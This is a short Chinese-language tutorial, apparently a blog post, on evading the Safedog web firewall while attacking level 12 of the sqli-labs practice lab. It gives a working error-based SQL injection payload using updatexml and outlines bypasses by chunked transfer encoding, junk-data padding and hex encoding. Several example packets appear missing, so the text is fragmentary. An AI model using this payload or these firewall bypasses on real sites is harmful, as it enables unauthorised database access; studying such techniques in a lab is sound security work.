这里使用的是sqli第12关

有安全狗防火墙，数据包如下

uname=123")%20and%20updatexml(0x3a,concat(0x3a,(select%20user()),0x3a),0x3a)#&passwd=123&submit=Submit

进行分块传输（这里用到一个插件）联系作者即可获取（备注【分块插件】）

编码请求体后

注意最后两行需要空着，但凡少一行都会造成请求不成功

少一行之后，响应失败

脏数据

构造大型数据包比如

但是如果没有足够大的数据包，也是不能够进行绕过的，比如

数据包中post无限制，get可能会进行限制

hex编码

这里没有复现案例，仅供参考

前提：没有过滤掉0x

例如

select * from users where name="admin"